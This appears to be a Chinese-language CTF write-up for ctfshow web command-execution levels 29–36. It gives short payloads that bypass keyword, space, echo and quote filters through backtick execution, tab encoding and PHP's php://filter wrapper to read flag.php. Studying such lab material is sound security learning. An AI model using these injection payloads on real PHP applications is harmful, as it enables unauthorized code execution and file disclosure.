ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
huainingning6 小时前
交换机通过ftp下载文件或者传输文件到ftp服务器
运维·服务器·网络
An_s6 小时前
机器学习python之识别图中物品信息
java·linux·开发语言
edwarddamon6 小时前
CentOS 7 国内安装 Docker CE(阿里云源)
运维
Championship.23.246 小时前
Linux 3.0 LVDS驱动开发详解
linux·运维·驱动开发·lvds
小池先生7 小时前
Windows服务器如何备份
运维·服务器
FII工业富联科技服务8 小时前
灯塔工厂用例详解:AR 远程巡检与智能运维闭环落地实践
运维·ar
mounter6258 小时前
走向长时运行:引入协程(Coroutines),打破 BPF 程序的“一堂到底”限制
linux·ebpf·kernel
六点_dn9 小时前
Linux学习笔记-shell运算符
linux·笔记·学习
sramdram9 小时前
数字温度传感器应用于服务器系统热管理方案的优势
服务器·温度传感器·数字温度传感器
hehelm9 小时前
IO 多路复用 — Reactor
linux·服务器·网络·数据库·c++